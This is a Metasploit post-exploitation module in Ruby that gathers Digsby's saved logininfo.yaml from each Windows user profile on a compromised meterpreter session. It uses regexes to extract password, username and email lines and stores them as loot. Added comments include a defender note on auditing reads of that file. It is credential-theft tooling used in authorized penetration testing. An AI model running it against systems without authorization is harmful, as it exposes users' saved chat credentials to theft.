rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/digsby.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
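# Post module that collects Digsby's saved login file from every user profile
# on a Windows session and hands it to the PackRat mixin for storage and
# pattern extraction.
#
# Everything specific to Digsby lives in the ARTIFACTS table below; the file
# collection itself is delegated to +run_packrat+ (presumably supplied by
# Msf::Post::Windows::Packrat -- its implementation is not part of this file).
#
# Defender note: the only on-host object this module names is
# <LocalAppData>\Digsby\logininfo.yaml. Reads of that file by anything other
# than Digsby itself are a useful audit signal, and credentials saved in it
# should be treated as exposed once the host has been compromised.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Declarative description of what to collect for Digsby.
  #
  # Each entry of :gatherable_artifacts names one file (profile path key,
  # directory, file name) and the regex groups applied to its contents.
  #
  # NOTE(review): +freeze+ is shallow -- the nested hashes and arrays stay
  # mutable. Whether the consumer relies on mutating them cannot be told
  # from this file, so the table is left shallow-frozen.
  ARTIFACTS =
    {
      application: 'digsby',
      app_category: 'chats',
      gatherable_artifacts: [
        {
          filetypes: 'logins',
          path: 'LocalAppData',
          dir: 'Digsby',
          artifact_file_name: 'logininfo.yaml',
          # The listing this was taken from showed the HTML entity "&amp;"
          # here; the literal ampersand is restored.
          description: "Digsby's saved Username & Passwords",
          credential_type: 'text',
          regex_search: [
            {
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
              extraction_type: 'credentials',
              # Case-insensitive and unanchored: each pattern matches from
              # the keyword to the end of the line ('.' does not cross
              # newlines because the m flag is switched off).
              regex: [
                '(?i-mx:password.*)',
                '(?i-mx:username.*)'
              ]
            },
            {
              extraction_description: 'searches for Email TO/FROM address',
              extraction_type: 'Email addresses',
              # Also unanchored, so any text containing "to:" or "from:"
              # matches, not only address headers -- expect over-matching.
              regex: [
                '(?i-mx:to:.*)',
                '(?i-mx:from:.*)'
              ]
            }
          ]
        }
      ]
    }.freeze

  # Registers module metadata and the user-settable options.
  #
  # @param info [Hash] metadata merged into this module's defaults via
  #   +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Digsby Credential Gatherer',
        'Description' => %q{
          This module searches for Digsby credentials on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # The ARTIFACTS enum is derived from the table above so the selectable
    # values cannot drift from what is actually defined; 'All' is prepended
    # as the catch-all choice and is also the default.
    artifact_choices = ARTIFACTS[:gatherable_artifacts]
                       .map { |artifact| artifact[:filetypes] }
                       .uniq
                       .unshift('All')

    register_options(
      [
        # NOTE(review): how REGEX is consumed is not visible in this file.
        # In Ruby '^' anchors at the start of every line, not of the whole
        # string -- confirm that per-line matching is what is intended.
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_choices])
      ]
    )
  end

  # Prints the active selections, then runs the PackRat collection once per
  # user profile returned by +grab_user_profiles+.
  #
  # @return [void]
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # One pass per user profile on the session host; the whole ARTIFACTS
    # table is handed over and any filtering by the ARTIFACTS option
    # happens inside run_packrat (not shown here).
    grab_user_profiles.each do |userprofile|
      run_packrat(userprofile, ARTIFACTS)
    end

    print_status('PackRat credential sweep completed')
  end
end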